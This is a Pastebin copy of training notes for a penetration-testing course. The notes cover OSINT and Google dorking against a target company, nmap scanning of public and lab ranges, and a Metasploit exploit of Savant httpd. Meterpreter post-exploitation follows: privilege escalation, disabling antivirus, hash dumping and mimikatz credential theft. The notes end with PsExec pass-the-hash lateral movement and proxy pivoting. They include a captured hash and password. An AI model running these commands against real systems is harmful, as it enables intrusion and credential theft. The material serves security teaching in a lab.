Advertisement
joemccray

New Advanced Pentester Night School 2016

Jan 4th, 2016
3,417
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ################################
  2. # Pentester Night School 2016 #
  3. # By Joe McCray #
  4. ################################
  5.  
  6.  
  7. ##########
  8. # VMWare #
  9. ##########
  10. - For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.
  11.  
  12. - Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.
  13.  
  14.  
  15. ##########################
  16. # Download the attack VM #
  17. ##########################
  18.  
  19. VM for these labs
  20. -----------------
  21. https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
  22. user: strategicsec
  23. pass: strategicsec
  24.  
  25. ---------------------------------------------------------------------------------------------------------------------------------
  26.  
  27.  
  28.  
  29.  
  30.  
  31. ################################
  32. # Tactical Pentest Methodology #
  33. ################################
  34.  
  35. The purpose of this section of the Pastebin document is to provide you with a tactical pentest plan.
  36.  
  37.  
  38.  
  39. -=-=-=-=-=- Phase 1 -=-=-=-=-=-
  40.  
  41.  
  42. ##########################################
  43. # Step 1: External Target Identification #
  44. ##########################################
  45. Find all of the IP ranges owned by your target company via the following websites:
  46. - https://www.robtex.com/
  47. - http://toolbar.netcraft.com/site_report
  48.  
  49. Look for weak SSL implementations
  50. - https://www.ssllabs.com/ssltest/
  51.  
  52.  
  53.  
  54.  
  55. #############################
  56. # Step 2: Google Quick Hits #
  57. #############################
  58.  
  59. Be thorough, and really look for vulnerabilities and data leakages that are relevant to what you learned while doing your OSINT work.
  60. https://www.exploit-db.com/google-hacking-database/
  61.  
  62. Really good google dorks to use:
  63. site:yourtarget.com filetype:pcf
  64. site:yourtarget.com filetype:ica
  65.  
  66. 1. Footholds:
  67. -------------
  68. https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=1&ghdb_search_text=
  69.  
  70. Be sure to use 'site:yourtarget.com' [ google dork for the site above ]
  71.  
  72.  
  73. 2. Passwords:
  74. -------------
  75. https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=9&ghdb_search_text=
  76.  
  77. Be sure to use 'site:yourtarget.com' [ google dork for the site above ]
  78.  
  79.  
  80. 3. Sensitive Directories:
  81. -------------------------
  82. https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=3&ghdb_search_text=
  83.  
  84. Be sure to use 'site:yourtarget.com' [ google dork for the site above ]
  85.  
  86.  
  87.  
  88.  
  89. Make sure that you do at least 50-100 different Google dorks. Do no less than 10 dorks per category.
  90.  
  91.  
  92.  
  93. ###########################
  94. # Step 3: Compromise Data #
  95. ###########################
  96. Look to see if they have already been breached
  97.  
  98. Search for the target company (and their major competitors) in the Data Breach Database
  99. http://www.privacyrights.org/data-breach
  100.  
  101. Place targetgcompany.com in the search box of the link below to look known breaches
  102. http://zone-h.com/search
  103.  
  104. Replace targetgcompany.com with your target domain name to look for known XSS vulnerabilities in the site.
  105. http://xssed.com/search?key=targetcompany.com
  106.  
  107.  
  108.  
  109. ##############################
  110. # Step 4: Build OSINT Report #
  111. ##############################
  112.  
  113. Passive Recon
  114. -------------
  115. Install this add-on and enumerate as much info as possible
  116. - https://addons.mozilla.org/en-US/firefox/addon/passiverecon/
  117.  
  118.  
  119. Next we build at an OSINT report with the data gleaned from the previous steps:
  120. https://s3.amazonaws.com/StrategicSec-Files/OSINT_Innophos_11242010.doc
  121.  
  122. We looked through this to get an idea of what is not only involved in doing passive recon, but what the actual output of the work should look like.
  123.  
  124. ---------------------------------------------------------------------------------------------------------------------------------
  125.  
  126. -=-=-=-=-=- Phase 2 -=-=-=-=-=-
  127. ##########################
  128. # Download the attack VM #
  129. ##########################
  130.  
  131. VM for these labs
  132. -----------------
  133. https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
  134. user: strategicsec
  135. pass: strategicsec
  136.  
  137.  
  138. ############################################
  139. # Identifying External Security Mechanisms #
  140. ############################################
  141.  
  142. sudo /sbin/iptables -F
  143. strategicsec
  144.  
  145. cd /home/strategicsec/toolz
  146.  
  147.  
  148.  
  149. ###########################
  150. # Target IP Determination #
  151. ###########################
  152. cd /home/strategicsec/toolz
  153. perl blindcrawl.pl -d targetgcompany.com
  154.  
  155. -- Take each IP address and look ip up here:
  156. http://www.networksolutions.com/whois/index.jsp
  157.  
  158. cd ~/toolz/fierce2
  159. fierce -dns targetgcompany.com
  160. cd ..
  161.  
  162.  
  163.  
  164. cd ~/toolz/
  165. ./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range)
  166.  
  167.  
  168. sudo nmap -sL 148.87.1.0-255
  169. strategicsec
  170.  
  171. sudo nmap -sL 148.87.1.0-255 | grep oracle
  172. strategicsec
  173.  
  174.  
  175. sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 148.87.1.0-255
  176. strategicsec
  177.  
  178. Reference:
  179. http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html
  180.  
  181.  
  182.  
  183. ###########################
  184. # Load Balancer Detection #
  185. ###########################
  186. Here are some command-line options to use for identifying load balancers:
  187.  
  188. dig google.com
  189.  
  190. cd ~/toolz
  191. ./lbd-0.1.sh targetgcompany.com
  192.  
  193.  
  194. halberd targetgcompany.com
  195.  
  196.  
  197.  
  198. ######################################
  199. # Web Application Firewall Detection #
  200. ######################################
  201.  
  202. cd ~/toolz/wafw00f
  203. python wafw00f.py http://www.targetgcompany.com
  204.  
  205. cd ~/toolz/
  206. sudo nmap -p 80 --script http-waf-detect.nse targetgcompany.com
  207. strategicsec
  208.  
  209. sudo nmap -p 80 --script http-waf-detect.nse targetgcompany.com
  210. strategicsec
  211.  
  212.  
  213. ---------------------------------------------------------------------------------------------------------------------------------
  214.  
  215. -=-=-=-=-=- Phase 3 -=-=-=-=-=-
  216. Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.
  217.  
  218. So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
  219. https://s3.amazonaws.com/StrategicSec-Files/Strategic-Security-2016-VPN-Info.pdf
  220.  
  221. sudo nmap -sP 10.0.0.0/24
  222.  
  223. sudo nmap -sL 10.0.0.0/24
  224.  
  225. cd ~/toolz
  226.  
  227. wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
  228.  
  229. gcc ipcrawl.c -o ipcrawl
  230.  
  231. chmod 777 ipcrawl
  232.  
  233. ./ipcrawl 10.0.0.1 10.0.0.254
  234.  
  235.  
  236.  
  237. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  238.  
  239. gcc propecia.c propecia
  240.  
  241. sudo cp propecia /bin
  242.  
  243. propecia 10.0.0 22
  244.  
  245. propecia 10.0.0 3389
  246.  
  247. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open
  248.  
  249. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}'
  250.  
  251. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l
  252.  
  253. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}'
  254.  
  255. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt
  256.  
  257. cd ~/toolz
  258. wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
  259. tar -jxvf wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
  260. sudo cp wkhtmltoimage-i386 /usr/local/bin/
  261.  
  262. git clone git://github.com/SpiderLabs/Nmap-Tools.git
  263. cd Nmap-Tools/NSE/
  264. sudo cp http-screenshot.nse /usr/share/nmap/scripts/
  265. sudo nmap --script-updatedb
  266.  
  267. cd ~/toolz/
  268. mkdir labscreenshots
  269. cd labscreenshots/
  270.  
  271. sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/strategicsec/labnet-ip-list.txt
  272.  
  273.  
  274.  
  275.  
  276. vi screenshots.sh
  277.  
  278. #!/bin/bash
  279. printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
  280. ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
  281. printf "</BODY></HTML>" >> labnet-port-80-screenshots.html
  282.  
  283.  
  284.  
  285.  
  286.  
  287. sh screenshots.sh
  288.  
  289.  
  290.  
  291.  
  292. ##########################
  293. # Nmap NSE tricks to try #
  294. ##########################
  295. sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24
  296.  
  297. sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24
  298.  
  299. sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24
  300.  
  301. sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24
  302.  
  303. sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24
  304.  
  305. sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24
  306.  
  307. sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24
  308.  
  309. sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24
  310.  
  311. sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24
  312.  
  313. sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24
  314.  
  315. sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24
  316.  
  317. sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24
  318.  
  319.  
  320.  
  321.  
  322. ####################################
  323. # Finally, let's exploit something #
  324. ####################################
  325.  
  326. nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}'
  327.  
  328. nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15
  329.  
  330. https://www.exploit-db.com/search
  331.  
  332. Search for:
  333. Savant httpd 3.1
  334. Apache httpd 2.0.58 ((Win32))
  335.  
  336.  
  337. Found one written in Python:
  338. https://www.exploit-db.com/exploits/18401/
  339.  
  340. Found one for Savant 3.1 from Metasploit:
  341. https://www.exploit-db.com/exploits/16770/
  342.  
  343.  
  344.  
  345. cd ~/toolz/metasploit
  346. ./msfconsole
  347. use exploit/windows/http/savant_31_overflow
  348. set RHOST 10.0.0.15
  349. set PAYLOAD windows/meterpreter/bind_nonx_tcp
  350. set RPORT 80
  351. set LPORT 7777
  352. exploit
  353.  
  354.  
  355.  
  356.  
  357.  
  358.  
  359. ********************************** Figure out who and where you are **********************************
  360.  
  361. meterpreter> sysinfo
  362.  
  363.  
  364. meterpreter> getuid
  365.  
  366.  
  367. meterpreter> ipconfig
  368.  
  369.  
  370. meterpreter> run post/windows/gather/checkvm
  371.  
  372.  
  373. meterpreter> run get_local_subnets
  374.  
  375.  
  376.  
  377. ********************************** Escalate privileges and get hashes **********************************
  378.  
  379.  
  380. meterpreter> use priv
  381.  
  382.  
  383.  
  384. meterpreter > getsystem
  385. ...got system (via technique 1).
  386.  
  387. meterpreter > getuid
  388. Server username: NT AUTHORITY\SYSTEM
  389.  
  390. --------------------------------------------------------
  391.  
  392. meterpreter> run killav
  393.  
  394. meterpreter> run post/windows/gather/hashdump
  395.  
  396. Got the following admin hash:
  397. Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363:::
  398.  
  399. meterpreter> run post/windows/gather/credentials/credential_collector
  400.  
  401. meterpreter > load mimikatz
  402.  
  403. meterpreter > kerberos
  404.  
  405. This should give me the administrative password:
  406. )K5?Jocb(Yx
  407.  
  408.  
  409. ********************************** Enumerate the host you are on **********************************
  410.  
  411. meterpreter> run winenum
  412.  
  413. meterpreter > run post/windows/gather/enum_applications
  414.  
  415. meterpreter > run post/windows/gather/enum_logged_on_users
  416.  
  417. meterpreter > run post/windows/gather/usb_history
  418.  
  419. meterpreter > run post/windows/gather/enum_shares
  420.  
  421. meterpreter > run post/windows/gather/enum_snmp
  422.  
  423. meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
  424.  
  425.  
  426. ********************************** Get out of Meterpreter **********************************
  427.  
  428. meterpreter> background
  429.  
  430. msf exploit(savant_31_overflow) > back
  431.  
  432. msf>
  433.  
  434.  
  435.  
  436.  
  437. ********************************** Lateral Movement *******************************
  438.  
  439.  
  440. Now we can run the PSEXEC exploit.
  441.  
  442. -- Option 1:
  443. use exploit/windows/smb/psexec
  444.  
  445. set SMBUser Administrator
  446.  
  447. set SMBPass )K5?Jocb(Yx
  448.  
  449. set RHOST 10.0.0.15
  450.  
  451. set payload windows/meterpreter/bind_tcp
  452.  
  453. set LPORT 2345
  454.  
  455. exploit
  456.  
  457. ********************************** Get out of Meterpreter **********************************
  458.  
  459. meterpreter> background
  460.  
  461. msf exploit(psexec) >back
  462.  
  463. msf>
  464.  
  465. **********************************
  466.  
  467. -- Option 2:
  468. use exploit/windows/smb/psexec
  469.  
  470. set SMBUser Administrator
  471.  
  472. set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363
  473.  
  474. set payload windows/meterpreter/bind_tcp
  475.  
  476. set RHOST 10.0.0.15
  477.  
  478. set LPORT 5678
  479.  
  480. exploit
  481.  
  482.  
  483.  
  484. ********************************** Set up your Pivot **********************************
  485.  
  486. meterpreter > background
  487. <-- background the session
  488. You want to get back to this prompt:
  489. msf exploit(handler) > back <--- you need to get to main msf> prompt
  490.  
  491.  
  492.  
  493. sessions -l <--find a session you want to pivot through (note the IP and session number)
  494.  
  495. Now set up Pivot with a route add
  496. ---------------------------------
  497.  
  498. route print <--- should be blank
  499.  
  500. route add 10.0.0.15 255.255.255.0 1 <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prommpt, not meterpreter)
  501.  
  502.  
  503. route print <----- verify new route
  504.  
  505. ******************************Scan through your Pivot ******************************
  506.  
  507. use auxiliary/scanner/portscan/tcp <-- Run aux modules through your pivot
  508.  
  509. set THREADS 10
  510.  
  511. set RHOSTS 10.0.0.0/24 <-- Keep changing this IP and re-running the scan until you find something you want to attack
  512.  
  513. set PORTS 445
  514.  
  515. run
  516.  
  517.  
  518. ####################################
  519. # Socks Tunneling with Proxychains #
  520. ####################################
  521. --- Open a duplicate putty session to your Ubuntu host
  522.  
  523. sudo apt-get install -y proxychains
  524. strategicsec
  525.  
  526. sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: socks4 127.0.0.1 1080
  527.  
  528. Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.
  529. socks4 127.0.0.1 1080
  530.  
  531. ***************************Set up a Socks Proxy through your Pivot *************************
  532.  
  533.  
  534. use auxiliary/server/socks4a
  535.  
  536. set SRVHOST 127.0.0.1
  537.  
  538. set SRVPORT 1080
  539.  
  540. run
  541.  
  542. --- Go back to your other putty session with the meterpreter shell
  543. cd ~
  544.  
  545. proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24 <--- This is going to be really slow
  546.  
  547. proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0/24 <--- This is going to be really slow
  548.  
  549.  
  550. ---close the duplicate putty session to your Ubuntu host
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement